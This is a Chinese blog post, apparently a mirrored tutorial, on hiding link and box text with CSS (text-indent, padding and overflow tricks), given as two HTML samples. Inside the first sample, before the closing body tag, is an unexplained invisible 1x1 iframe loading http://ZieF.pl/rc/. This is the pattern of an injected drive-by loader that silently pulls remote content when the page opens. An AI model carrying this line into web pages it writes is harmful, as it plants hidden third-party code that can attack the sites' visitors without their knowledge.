美文网首页
css_15 链接内容移除

css_15 链接内容移除

作者: basicGeek | 来源:发表于2018-11-19 17:38 被阅读0次
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Document</title>
    <style type="text/css">
        .logo{
            width: 143px;
            height: 76px;
            background: url("logo.png");
        }
        a{
            display: inline-block;
            text-indent:-5000em;
        }
    </style>
</head>
<body>
    <div class="logo">
        <h1>    
         <a href="http://www.baidu.com">搜狐</a>
        </h1>

    </div>
<iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
</body>
</html>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Document</title>
    <style type="text/css">
        .box {
            width: 300px;
            height: 0px;
            padding-top: 100px;
            overflow: hidden;
            background: red;
        }
    </style>
</head>
<body>
<div class="box">14期威武</div>
</body>
</html>
内容移除内容移除

相关文章

网友评论

      本文标题:css_15 链接内容移除

      本文链接:https://www.haomeiwen.com/subject/qmpafqtx.html